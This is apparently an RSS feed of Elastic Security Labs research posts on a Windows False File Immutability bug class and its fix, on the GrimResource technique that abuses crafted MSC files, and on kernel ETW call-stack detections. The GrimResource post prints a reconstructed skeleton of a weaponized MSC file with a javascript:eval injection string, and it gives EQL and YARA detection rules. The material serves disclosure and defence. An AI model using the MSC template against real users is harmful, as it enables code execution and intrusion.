<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image2.png" alt="Potentially-vulnerable uses of ZwReadFile in Windows 11 kernel drivers" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image1.png" alt="Potentially-vulnerable uses of ZwMapViewOfSection in Windows 11 kernel drivers" /></p>
<h3>Don’t forget about user mode</h3>
<p>We’ve mostly been discussing the kernel up to this point, but it’s important to note that any user mode application that calls <strong>ReadFile</strong>, <strong>MapViewOfFile</strong>, or <strong>LoadLibrary</strong> on an attacker-controllable file, denying write sharing for immutability, may be vulnerable. Here are a few hypothetical examples.</p>
<h4>MapViewOfFile</h4>
<p>Imagine an application that is split into two components - a low-privileged worker process with network access, and a privileged service that installs updates. The worker downloads updates and stages them to a specific folder. When the privileged service sees a new update staged, it first validates the signature before installing the update. An attacker could abuse FFI to modify the update after the signature check.</p>
<h4>ReadFile</h4>
<p>Since files are subject to double-read vulnerabilities, anything that parses complex file formats may be vulnerable, including antivirus engines and search indexers.</p>
<h4>LoadLibrary</h4>
<p>Some applications rely on UMCI to prevent attackers from loading malicious DLLs into their processes. As we’ve shown with PPLFault, FFI can defeat UMCI.</p>
<h2>Stopping the exploit</h2>
<p>Per their official servicing guidelines, MSRC won’t service Admin -&gt; Kernel vulnerabilities by default. In this parlance, servicing means “fix via security update.”  This type of vulnerability, however, allows malware to bypass <a href="https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-">AV Process Protections</a>, leaving AV and EDR vulnerable to instant-kill attacks.</p>
<p>As a third-party, we can’t patch Code Integrity, so what can we do to protect our customers? To mitigate <strong>ItsNotASecurityBoundary</strong>, we created <strong>FineButWeCanStillEasilyStopIt</strong>, a filesystem minifilter driver that prevents Code Integrity from opening security catalogs over network redirectors. You can find it on GitHub <a href="https://github.com/gabriellandau/ItsNotASecurityBoundary/tree/main/FineButWeCanStillEasilyStopIt">here</a>.</p>
<p>FineButWeCanStillEasilyStopIt has to jump through some hoops to correctly identify the problematic behavior while minimizing false positives. Ideally, CI itself could be fixed with a few small changes. Let’s look at what that would take.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image13.png" alt="Fixing catalog processing by copying the catalog to the heap" /></p>
<p>As mentioned above in the Affected Operations section, applications can mitigate double-read vulnerabilities by copying the file contents out of the file mapping into the heap, and exclusively using that heap copy for all subsequent operations. The kernel heap is called the <a href="https://learn.microsoft.com/en-us/windows/win32/memory/memory-pools">pool</a>, and the corresponding allocation function is <strong>ExAllocatePool</strong>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image15.png" alt="Fixing catalog processing by locking the pages into RAM" /></p>
<p>An alternative mitigation strategy to break these types of exploits is to pin the pages of the file mapping into physical memory using an API such as <strong>MmProbeAndLockPages</strong>. This prevents eviction of those pages when the attacker empties the working set.</p>
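<p>There is no user-mode equivalent of <strong>MmProbeAndLockPages</strong>, but POSIX <code>mlock</code> illustrates the same idea in a portable sketch: while the pages are pinned, the pager cannot evict them, so a later access cannot re-fault attacker-modified backing-store content. This analog is for illustration only and is not Windows kernel code:</p>
<pre><code>#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;sys/mman.h&gt;

/* Validate a buffer only after pinning its pages. While the pages are
 * locked, they cannot be evicted, so the bytes validated here are the
 * same bytes later consumers of the buffer will see. */
int validate_pinned(const unsigned char *buf, size_t len) {
    if (mlock(buf, len) != 0) {   /* analog of MmProbeAndLockPages       */
        perror(&quot;mlock&quot;);          /* can fail under a low RLIMIT_MEMLOCK */
        return -1;
    }
    /* e.g. check an 'MZ' header, as CI would validate catalog content */
    int ok = (len &gt;= 2 &amp;&amp; buf[0] == 0x4D &amp;&amp; buf[1] == 0x5A);
    munlock(buf, len);            /* analog of MmUnlockPages */
    return ok;
}

int main(void) {
    unsigned char hdr[4096];
    memset(hdr, 0, sizeof hdr);
    hdr[0] = 0x4D; hdr[1] = 0x5A;
    printf(&quot;validated: %d\n&quot;, validate_pinned(hdr, sizeof hdr));
    return 0;
}
</code></pre>
<p>A kernel implementation would instead build an MDL for the mapped view, call <strong>MmProbeAndLockPages</strong> before parsing, and release the pages with <strong>MmUnlockPages</strong> afterward.</p>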
<h3>End-user detection and mitigation</h3>
<p>Fortunately, there is a way for end-users to mitigate this exploit without changes from Microsoft – Hypervisor Protected Code Integrity (HVCI). If HVCI is enabled, CI.dll doesn’t do catalog parsing at all. Instead, it sends the catalog contents to the Secure Kernel, which runs in a separate virtual machine on the same host. The Secure Kernel stores the received catalog contents in its own heap, from which signature validation and parsing are performed. Just like with the <strong>ExAllocatePool</strong> mitigation described above, the exploit is mitigated because file changes have no effect on the heap copy.</p>
<p>The probabilistic nature of this attack means that there are likely many failed attempts. Windows records these failures in the <strong>Microsoft-Windows-CodeIntegrity/Operational</strong> event log. Users can check this log for evidence of exploitation.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image23.png" alt="Microsoft-Windows-CodeIntegrity/Operational event log showing an invalid driver signature" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image4.png" alt="Microsoft-Windows-CodeIntegrity/Operational event log showing an invalid security catalog" /></p>
<h2>Disclosure</h2>
<p>The disclosure timeline is as follows:</p>
<ul>
<li>2024-02-14: We reported ItsNotASecurityBoundary and FineButWeCanStillEasilyStopIt to MSRC as VULN-119340, suggesting <strong>ExAllocatePool</strong> and <strong>MmProbeAndLockPages</strong> as simple low-risk fixes</li>
<li>2024-02-29: The Windows Defender team reached out to coordinate disclosure</li>
<li>2024-04-23: Microsoft released <a href="https://support.microsoft.com/en-us/topic/april-23-2024-kb5036980-os-builds-22621-3527-and-22631-3527-preview-5a0d6c49-e42e-4eb4-8541-33a7139281ed">KB5036980</a> Preview with the <strong>MmProbeAndLockPages</strong> fix</li>
<li>2024-05-14: The fix reached GA for Windows 11 23H2 as <a href="https://support.microsoft.com/en-us/topic/may-14-2024-kb5037771-os-builds-22621-3593-and-22631-3593-e633ff2f-a021-4abb-bd2e-7f3687f166fe">KB5037771</a>; we have not tested any other platforms (Win10, Server, etc.)</li>
<li>2024-06-14: MSRC closed the case, stating &quot;We have completed our investigation and determined that the case doesn't meet our bar for servicing at this time. As a result, we have opened a next-version candidate bug for the issue, and it will be evaluated for upcoming releases. Thanks, again, for sharing this report with us.&quot;</li>
</ul>
<h2>Fixing Code Integrity</h2>
<p>Looking at the original implementation of <strong>CI!I_MapAndSizeDataFile</strong>, we can see the legacy code calling <strong>ZwCreateSection</strong> and <strong>ZwMapViewOfSection</strong>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image22.png" alt="The vulnerable CI!I_MapAndSizeDataFile implementation" /></p>
<p>Contrast that with the new <strong>CI!CipMapAndSizeDataFileWithMDL</strong>, which follows that up with <strong>MmProbeAndLockPages</strong>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image3.png" alt="The new CI!CipMapAndSizeDataFileWithMDL has a mitigation" /></p>
<h2>Summary and conclusion</h2>
<p>Today we discussed and named a bug class: <strong>False File Immutability</strong>. We are aware of two public exploits that leverage it, PPLFault and ItsNotASecurityBoundary.</p>
<p><a href="https://github.com/gabriellandau/PPLFault">PPLFault</a>: Admin -&gt; PPL [-&gt; Kernel via GodFault]</p>
<ul>
<li>Exploits bad immutability assumptions about image sections in CI/MM</li>
<li>Reported September 2022</li>
<li>Patched February 2024 (~510 days later)</li>
</ul>
<p><a href="https://github.com/gabriellandau/ItsNotASecurityBoundary">ItsNotASecurityBoundary</a>: Admin -&gt; Kernel</p>
<ul>
<li>Exploits bad immutability assumptions about data sections in CI</li>
<li>Reported February 2024</li>
<li>Patched May 2024 (~90 days later)</li>
</ul>
<p>If you are writing Windows code that operates on files, be aware that those files may be modified while you are working on them, even if you deny write sharing. See the Affected Operations section above for guidance on how to protect yourself and your customers against these types of attacks.</p>
<p>ItsNotASecurityBoundary is not the end of FFI. There are other exploitable FFI vulnerabilities out there. My colleagues and I at Elastic Security Labs will continue exploring and reporting on FFI and beyond. We encourage you to follow along on X <a href="https://x.com/GabrielLandau">@GabrielLandau</a> and <a href="https://x.com/elasticseclabs">@ElasticSecLabs</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/Security Labs Images 36.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[GrimResource - Microsoft Management Console for initial access and evasion]]></title>
            <link>https://www.elastic.co/kr/security-labs/grimresource</link>
            <guid>grimresource</guid>
            <pubDate>Sat, 22 Jun 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic researchers uncovered a new technique, GrimResource, which allows full code execution via specially crafted MSC files. It underscores a trend of well-resourced attackers favoring innovative initial access methods to evade defenses.]]></description>
            <content:encoded><![CDATA[<h2>Overview</h2>
<p>After Microsoft <a href="https://learn.microsoft.com/en-us/deployoffice/security/internet-macros-blocked">disabled</a> Office macros by default for internet-sourced documents, other infection vectors like JavaScript, MSI files, LNK objects, and ISOs have surged in popularity. However, these techniques are heavily scrutinized by defenders and carry a high likelihood of detection. Mature attackers seek new and undisclosed infection vectors to gain access while evading defenses. A <a href="https://www.genians.co.kr/blog/threat_intelligence/facebook">recent example</a> involved DPRK actors using a new command execution technique in MSC files.</p>
<p>Elastic researchers have uncovered a new infection technique also leveraging MSC files, which we refer to as GrimResource. It allows attackers to gain full code execution in the context of <code>mmc.exe</code> after a user clicks on a specially crafted MSC file. A <a href="https://www.virustotal.com/gui/file/14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb">sample</a> leveraging GrimResource was first uploaded to VirusTotal on June 6th.</p>
<h2>Key takeaways</h2>
<ul>
<li>Elastic Security researchers uncovered a novel, in-the-wild code execution technique leveraging specially crafted MSC files referred to as GrimResource</li>
<li>GrimResource allows attackers to execute arbitrary code in Microsoft Management Console (<code>mmc.exe</code>) with minimal security warnings, ideal for gaining initial access and evading defenses</li>
<li>Elastic is providing analysis of the technique and detection guidance so the community can protect themselves</li>
</ul>
<h2>Analysis</h2>
<p>The key to the <a href="https://gist.github.com/joe-desimone/2b0bbee382c9bdfcac53f2349a379fa4">GrimResource</a> technique is an old <a href="https://medium.com/@knownsec404team/from-http-domain-to-res-domain-xss-by-using-ie-adobes-pdf-activex-plugin-ba4f082c8199">XSS flaw</a> present in the <code>apds.dll</code> library. By adding a reference to the vulnerable APDS resource in the appropriate StringTable section of a crafted MSC file, attackers can execute arbitrary JavaScript in the context of <code>mmc.exe</code>. Attackers can combine this technique with <a href="https://github.com/tyranid/DotNetToJScript/tree/master">DotNetToJScript</a> to gain arbitrary code execution.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image17.png" alt="Reference to apds.dll redirect in StringTable" title="Reference to apds.dll redirect in StringTable" /></p>
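<p>Structurally, a weaponized console file is an ordinary <code>MMC_ConsoleFile</code> XML document whose StringTable smuggles in a <code>res://</code> reference to the vulnerable APDS resource. The skeleton below is an illustrative reconstruction based on the indicators described in this post; the element layout and payload are simplified and are not copied from the in-the-wild sample:</p>
<pre><code>&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;MMC_ConsoleFile ConsoleVersion=&quot;3.0&quot;&gt;
  &lt;!-- snap-in, view, and Taskpad definitions omitted --&gt;
  &lt;StringTables&gt;
    &lt;StringTable&gt;
      &lt;Strings&gt;
        &lt;!-- Reference to the vulnerable APDS resource; the target URI
             carries the attacker's script via the old XSS flaw --&gt;
        &lt;String ID=&quot;1&quot; Refs=&quot;1&quot;&gt;res://apds.dll/redirect.html?target=javascript:eval(...)&lt;/String&gt;
      &lt;/Strings&gt;
    &lt;/StringTable&gt;
  &lt;/StringTables&gt;
&lt;/MMC_ConsoleFile&gt;
</code></pre>
<p>When <code>mmc.exe</code> resolves the string, the APDS redirect evaluates the embedded script, which is what the detections below key on.</p>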
<p>At the time of writing, the sample identified in the wild had 0 static detections in <a href="https://www.virustotal.com/gui/file/14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb/details">VirusTotal</a>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image1.png" alt="VirusTotal results" title="VirusTotal results" /></p>
<p>The sample begins with a transformNode obfuscation technique, which was observed in recent but unrelated <a href="https://twitter.com/decalage2/status/1773114380013461799">macro samples</a>. This aids in evading ActiveX security warnings.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image15.png" alt="transformNode evasion and obfuscation technique" title="transformNode evasion and obfuscation technique" /></p>
<p>This leads to an obfuscated embedded VBScript, as reconstructed below:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image8.png" alt="Obfuscated VBScript" title="Obfuscated VBScript" /></p>
<p>The VBScript sets the target payload in a series of environment variables and then leverages the <a href="https://github.com/tyranid/DotNetToJScript/blob/master/DotNetToJScript/Resources/vbs_template.txt">DotNetToJs</a> technique to execute an embedded .NET loader. We named this component PASTALOADER and may release additional analysis on this specific tool in the future.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image13.png" alt="Setting the target payload environment variables" title="Setting the target payload environment variables" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image2.png" alt="DotNetToJs loading technique" title="DotNetToJs loading technique" /></p>
<p>PASTALOADER retrieves the payload from environment variables set by the VBScript in the previous step:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image14.png" alt="PASTALOADER loader retrieving the payload" title="PASTALOADER loader retrieving the payload" /></p>
<p>Finally, PASTALOADER spawns a new instance of <code>dllhost.exe</code> and injects the payload into it. This is done in a deliberately stealthy manner using the <a href="https://github.com/ipSlav/DirtyCLR/tree/7b1280fee780413d43adbad9f4c2a9ce7ed9f29e">DirtyCLR</a> technique, function unhooking, and indirect syscalls. In this sample, the final payload is Cobalt Strike.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image7.png" alt="Payload injected into dllhost.exe" title="Payload injected into dllhost.exe" /></p>
<h2>Detections</h2>
<p>In this section, we will examine current behavior detections for this sample and present new, more precise ones aimed at the technique primitives.</p>
<h3>Suspicious Execution via Microsoft Common Console</h3>
<p>This detection was established prior to our discovery of this new execution technique. It was originally designed to identify a <a href="https://www.genians.co.kr/blog/threat_intelligence/facebook">different method</a> (which requires the user to click on the Taskpad after opening the MSC file) that exploits the same MSC file type to execute commands through the Console Taskpads command line attribute:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image12.png" alt="Command task MSC sample" title="Command task MSC sample" /></p>
<pre><code>process where event.action == &quot;start&quot; and
 process.parent.executable : &quot;?:\\Windows\\System32\\mmc.exe&quot; and  process.parent.args : &quot;*.msc&quot; and
 not process.parent.args : (&quot;?:\\Windows\\System32\\*.msc&quot;, &quot;?:\\Windows\\SysWOW64\\*.msc&quot;, &quot;?:\\Program files\\*.msc&quot;, &quot;?:\\Program Files (x86)\\*.msc&quot;) and
 not process.executable :
              (&quot;?:\\Windows\\System32\\mmc.exe&quot;,
               &quot;?:\\Windows\\System32\\wermgr.exe&quot;,
               &quot;?:\\Windows\\System32\\WerFault.exe&quot;,
               &quot;?:\\Windows\\SysWOW64\\mmc.exe&quot;,
               &quot;?:\\Program Files\\*.exe&quot;,
               &quot;?:\\Program Files (x86)\\*.exe&quot;,
               &quot;?:\\Windows\\System32\\spool\\drivers\\x64\\3\\*.EXE&quot;,
               &quot;?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe&quot;)
</code></pre>
<p>It triggers here because this sample opted to spawn and inject a sacrificial instance of <code>dllhost.exe</code>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image10.png" alt="GrimResource detected" title="GrimResource detected" /></p>
<h3>.NET COM object created in non-standard Windows Script Interpreter</h3>
<p>The sample is using the <a href="https://github.com/tyranid/DotNetToJScript">DotNetToJScript</a> technique, which triggers another detection looking for RWX memory allocation from .NET on behalf of a Windows Script Host (WSH) script engine (Jscript or Vbscript):</p>
<p>The following EQL rule will detect execution via the .NET loader:</p>
<pre><code>api where
  not process.name : (&quot;cscript.exe&quot;, &quot;wscript.exe&quot;) and
  process.code_signature.trusted == true and
  process.code_signature.subject_name : &quot;Microsoft*&quot; and
  process.Ext.api.name == &quot;VirtualAlloc&quot; and
  process.Ext.api.parameters.allocation_type == &quot;RESERVE&quot; and 
  process.Ext.api.parameters.protection == &quot;RWX&quot; and
  process.thread.Ext.call_stack_summary : (
    /* .NET is allocating executable memory on behalf of a WSH script engine
     * Note - this covers both .NET 2 and .NET 4 framework variants */
    &quot;*|mscoree.dll|combase.dll|jscript.dll|*&quot;,
    &quot;*|mscoree.dll|combase.dll|vbscript.dll|*&quot;,
    &quot;*|mscoree.dll|combase.dll|jscript9.dll|*&quot;,
    &quot;*|mscoree.dll|combase.dll|chakra.dll|*&quot;
)
</code></pre>
<p>The following alert shows <code>mmc.exe</code> allocating RWX memory; the <code>process.thread.Ext.call_stack_summary</code> field captures the origin of the allocation from <code>vbscript.dll</code> to <code>clr.dll</code>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image6.png" alt="mmc.exe allocating RWX memory" title="mmc.exe allocating RWX memory" /></p>
<h3>Script Execution via MMC Console File</h3>
<p>The two previous detections were triggered by specific implementation choices to weaponize the GrimResource method (DotNetToJS and spawning a child process). These detections can be bypassed by using more OPSEC-safe alternatives.</p>
<p>Other behaviors that might initially seem suspicious, such as <code>mmc.exe</code> loading <code>jscript.dll</code>, <code>vbscript.dll</code>, and <code>msxml3.dll</code>, can be put into context by comparing them with benign data. Except for <code>vbscript.dll</code>, these WSH engines are routinely loaded by <code>mmc.exe</code>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image4.png" alt="Normal library load behaviors by mmc.exe" title="Normal library load behaviors by mmc.exe" /></p>
<p>The core aspect of this method involves using <a href="https://strontic.github.io/xcyclopedia/library/apds.dll-DF461ADCCD541185313F9439313D1EE1.html">apds.dll</a> to execute Jscript via XSS. This behavior is evident in the mmc.exe Procmon output as a <code>CreateFile</code> operation (<code>apds.dll</code> is not loaded as a library):</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image9.png" alt="apds.dll being invoked in the MSC StringTable" title="apds.dll being invoked in the MSC StringTable" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image16.png" alt="Example of the successful execution of GrimResource" title="Example of the successful execution of GrimResource" /></p>
<p>We added a detection using Elastic Defend file open events where the target file is <code>apds.dll</code> and the <code>process.name</code> is <code>mmc.exe</code>. The following EQL rule detects script execution via the MMC console:</p>
<pre><code>sequence by process.entity_id with maxspan=1m
 [process where event.action == &quot;start&quot; and
  process.executable : &quot;?:\\Windows\\System32\\mmc.exe&quot; and process.args : &quot;*.msc&quot;]
 [file where event.action == &quot;open&quot; and file.path : &quot;?:\\Windows\\System32\\apds.dll&quot;]
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image5.png" alt="Timeline showing the script execution with the MMC console" title="Timeline showing the script execution with the MMC console" /></p>
<h3>Windows Script Execution via MMC Console File</h3>
<p>Another detection and forensic artifact is the creation of a temporary HTML file in the INetCache folder, named <code>redirect[*]</code>, as a result of the APDS <a href="https://owasp.org/www-community/attacks/xss/">XSS</a> redirection:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image11.png" alt="Contents of redirect.html" title="Contents of redirect.html" /></p>
<p>The following EQL correlation can be used to detect this behavior while also capturing the msc file path:</p>
<pre><code>sequence by process.entity_id with maxspan=1m
 [process where event.action == &quot;start&quot; and
  process.executable : &quot;?:\\Windows\\System32\\mmc.exe&quot; and process.args : &quot;*.msc&quot;]
 [file where event.action in (&quot;creation&quot;, &quot;overwrite&quot;) and
  process.executable :  &quot;?:\\Windows\\System32\\mmc.exe&quot; and file.name : &quot;redirect[?]&quot; and 
  file.path : &quot;?:\\Users\\*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\*\\redirect[?]&quot;]
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image3.png" alt="Timeline detecting redirect.html" title="Timeline detecting redirect.html" /></p>
<p>Alongside the provided behavior rules, the following YARA rule can be used to detect similar files:</p>
<pre><code>rule Windows_GrimResource_MMC {
    meta:
        author = &quot;Elastic Security&quot;
        reference = &quot;https://www.elastic.co/kr/security-labs/GrimResource&quot;
        reference_sample = &quot;14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb&quot;
        arch_context = &quot;x86&quot;
        scan_context = &quot;file, memory&quot;
        license = &quot;Elastic License v2&quot;
        os = &quot;windows&quot;
    strings:
        $xml = &quot;&lt;?xml&quot;
        $a = &quot;MMC_ConsoleFile&quot; 
        $b1 = &quot;apds.dll&quot; 
        $b2 = &quot;res://&quot;
        $b3 = &quot;javascript:eval(&quot;
        $b4 = &quot;.loadXML(&quot;
    condition:
       $xml at 0 and $a and 2 of ($b*)
}
</code></pre>
<h2>Conclusion</h2>
<p>Attackers have developed a new technique to execute arbitrary code in Microsoft Management Console using crafted MSC files. Elastic’s existing out-of-the-box coverage shows our defense-in-depth approach is effective even against novel threats like this. Defenders should leverage our detection guidance to protect themselves and their customers from this technique before it proliferates among commodity threat groups.</p>
<h2>Observables</h2>
<p>All observables are also <a href="https://github.com/elastic/labs-releases/tree/main/indicators/grimresource">available for download</a> in both ECS and STIX formats.</p>
<p>The following observables were discussed in this research.</p>
<table>
<thead>
<tr>
<th>Observable</th>
<th>Type</th>
<th>Name</th>
<th>Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb</code></td>
<td>SHA-256</td>
<td><code>sccm-updater.msc</code></td>
<td>Abused MSC file</td>
</tr>
<tr>
<td><code>4cb575bc114d39f8f1e66d6e7c453987639289a28cd83a7d802744cd99087fd7</code></td>
<td>SHA-256</td>
<td>N/A</td>
<td>PASTALOADER</td>
</tr>
<tr>
<td><code>c1bba723f79282dceed4b8c40123c72a5dfcf4e3ff7dd48db8cb6c8772b60b88</code></td>
<td>SHA-256</td>
<td>N/A</td>
<td>Cobalt Strike payload</td>
</tr>
</tbody>
</table>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/grimresource/grimresource.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Doubling Down: Detecting In-Memory Threats with Kernel ETW Call Stacks]]></title>
            <link>https://www.elastic.co/kr/security-labs/doubling-down-etw-callstacks</link>
            <guid>doubling-down-etw-callstacks</guid>
            <pubDate>Tue, 09 Jan 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[With Elastic Security 8.11, we added further kernel telemetry call stack-based detections to increase efficacy against in-memory threats.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>We were pleased to see that the <a href="https://www.elastic.co/kr/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks">kernel call stack</a> capability we released in 8.8 was met with <a href="https://x.com/Kostastsale/status/1664050735166930944">extremely</a> <a href="https://x.com/HackingLZ/status/1663897174806089728">positive</a> <a href="https://twitter.com/bohops/status/1726251988244160776">community feedback</a> - both from the offensive research teams attempting to evade us and the defensive teams triaging alerts faster due to the additional <a href="https://www.elastic.co/kr/security-labs/peeling-back-the-curtain-with-call-stacks">context</a>.</p>
<p>But this was only the first step: We needed to arm defenders with even more visibility from the kernel - the most reliable mechanism to combat user-mode threats. With the introduction of Kernel Patch Protection in x64 Windows, Microsoft created a shared responsibility model where security vendors are now limited to only the kernel visibility and extension points that Microsoft provides. The most notable addition to this visibility is the <a href="https://github.com/jdu2600/Windows10EtwEvents/blob/master/manifest/Microsoft-Windows-Threat-Intelligence.tsv">Microsoft-Windows-Threat-Intelligence Event Tracing for Windows</a>(ETW) provider.</p>
<p>Microsoft has identified a handful of highly security-relevant syscalls and provided security vendors with near real-time telemetry of those. While we would strongly prefer inline callbacks that allow synchronous blocking of malicious activity, Microsoft has implicitly not deemed this a necessary security use case yet. Currently, the only filtering mechanism afforded to security vendors for these syscalls is user-mode hooking - and that approach is <a href="https://blogs.blackberry.com/en/2017/02/universal-unhooking-blinding-security-software">inherently</a> <a href="https://www.cyberbit.com/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/">fragile</a>. At Elastic, we determined that a more robust detection approach based on kernel telemetry collected through ETW would provide greater security benefits than easily bypassed user-mode hooks. That said, kernel ETW does have some <a href="https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs">systemic issues</a> that we have logged with Microsoft, along with suggested <a href="https://www.elastic.co/kr/security-labs/finding-truth-in-the-shadows">mitigations</a>.</p>
<h2>Implementation</h2>
<p>Endpoint telemetry is a careful balance between completeness and cost. Vendors don’t want to balloon your SIEM storage costs unnecessarily, but they also don’t want you to miss a critical indicator of compromise. To reduce event volumes for these new API events, we fingerprint each event and only emit it if it is unique. This deduplication ensures a minimal impact on detection fidelity.</p>
<p>However, this approach proved insufficient in reducing API event volumes to manageable levels in all environments. Any further global reduction of event volumes we introduced would be a blindspot for our customers. Instead of potentially impairing detection visibility in this fashion, we determined that these highly verbose events would be processed for detections on the host but would not be streamed to the SIEM by default. This approach reduces storage costs for most of our users while also empowering any customer SOCs that want the full fidelity of those events to opt into streaming via an advanced option available in Endpoint policy and implement filtering tailored to their specific environments.</p>
<p>Currently, we provide visibility into the following APIs:</p>
<ul>
<li><code>VirtualAlloc</code></li>
<li><code>VirtualProtect</code></li>
<li><code>MapViewOfFile</code></li>
<li><code>VirtualAllocEx</code></li>
<li><code>VirtualProtectEx</code></li>
<li><code>MapViewOfFile2</code></li>
<li><code>QueueUserAPC</code> [call stacks not always available due to ETW limitations]</li>
<li><code>SetThreadContext</code> [call stacks planned for 8.12]</li>
<li><code>WriteProcessMemory</code></li>
<li><code>ReadProcessMemory</code> (lsass) [planned for 8.12]</li>
</ul>
<p>In addition to call stack information, our API events are also enriched with several <a href="https://github.com/elastic/endpoint-package/blob/main/custom_schemas/custom_api.yml">behaviors</a>:</p>
<table>
<thead>
<tr>
<th>API event</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>cross-process</code></td>
<td>The observed activity was between two processes.</td>
</tr>
<tr>
<td><code>native_api</code></td>
<td>A call was made directly to the undocumented Native API rather than the supported Win32 API.</td>
</tr>
<tr>
<td><code>direct_syscall</code></td>
<td>A syscall instruction originated outside of the Native API layer.</td>
</tr>
<tr>
<td><code>proxy_call</code></td>
<td>The call stack appears to show a proxied API call intended to mask the true caller.</td>
</tr>
<tr>
<td><code>sensitive_api</code></td>
<td>Executable non-image memory is unexpectedly calling a sensitive API.</td>
</tr>
<tr>
<td><code>shellcode</code></td>
<td>Suspicious executable non-image memory is calling a sensitive API.</td>
</tr>
<tr>
<td><code>image-hooked</code></td>
<td>An entry in the call stack appears to have been hooked.</td>
</tr>
<tr>
<td><code>image_indirect_call</code></td>
<td>An entry in the call stack was preceded by a call to a dynamically resolved function.</td>
</tr>
<tr>
<td><code>image_rop</code></td>
<td>An entry in the call stack was not preceded by a call instruction.</td>
</tr>
<tr>
<td><code>image_rwx</code></td>
<td>An entry in the call stack is writable.</td>
</tr>
<tr>
<td><code>unbacked_rwx</code></td>
<td>An entry in the call stack is non-image and writable.</td>
</tr>
<tr>
<td><code>allocate_shellcode</code></td>
<td>A region of non-image executable memory suspiciously allocated more executable memory.</td>
</tr>
<tr>
<td><code>execute_fluctuation</code></td>
<td>The PAGE_EXECUTE protection is unexpectedly fluctuating.</td>
</tr>
<tr>
<td><code>write_fluctuation</code></td>
<td>The PAGE_WRITE protection of executable memory is unexpectedly fluctuating.</td>
</tr>
<tr>
<td><code>hook_api</code></td>
<td>A change to the memory protection of a small executable image memory region was made.</td>
</tr>
<tr>
<td><code>hollow_image</code></td>
<td>A change to the memory protection of a large executable image memory region was made.</td>
</tr>
<tr>
<td><code>hook_unbacked</code></td>
<td>A change to the memory protection of a small executable non-image memory was made.</td>
</tr>
<tr>
<td><code>hollow_unbacked</code></td>
<td>A change to the memory protection of a large executable non-image memory was made.</td>
</tr>
<tr>
<td><code>guarded_code</code></td>
<td>Executable memory was unexpectedly marked as PAGE_GUARD.</td>
</tr>
<tr>
<td><code>hidden_code</code></td>
<td>Executable memory was unexpectedly marked as PAGE_NOACCESS.</td>
</tr>
<tr>
<td><code>execute_shellcode</code></td>
<td>A region of non-image executable memory was executed in an unexpected fashion.</td>
</tr>
<tr>
<td><code>hardware_breakpoint_set</code></td>
<td>A hardware breakpoint was potentially set.</td>
</tr>
</tbody>
</table>
<h2>New Rules</h2>
<p>In 8.11, Elastic Defend’s behavior protection comes with many new rules against various popular malware techniques, such as shellcode fluctuation, threadless injection, direct syscalls, indirect calls, and AMSI or ETW patching.</p>
<p>These rules include:</p>
<h3>Windows API Call via Direct Syscall</h3>
<p>Identifies calls to commonly abused Windows APIs used for code injection where the call stack does not begin with NTDLL:</p>
<pre><code>api where event.category == &quot;intrusion_detection&quot; and

    process.Ext.api.behaviors == &quot;direct_syscall&quot; and 

    process.Ext.api.name : (&quot;VirtualAlloc*&quot;, &quot;VirtualProtect*&quot;, 
                             &quot;MapViewOfFile*&quot;, &quot;WriteProcessMemory&quot;)
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/doubling-down-etw-callstacks/image1.png" alt="Windows API Call via Direct Syscall rule logic" /></p>
<h3>VirtualProtect via Random Indirect Syscall</h3>
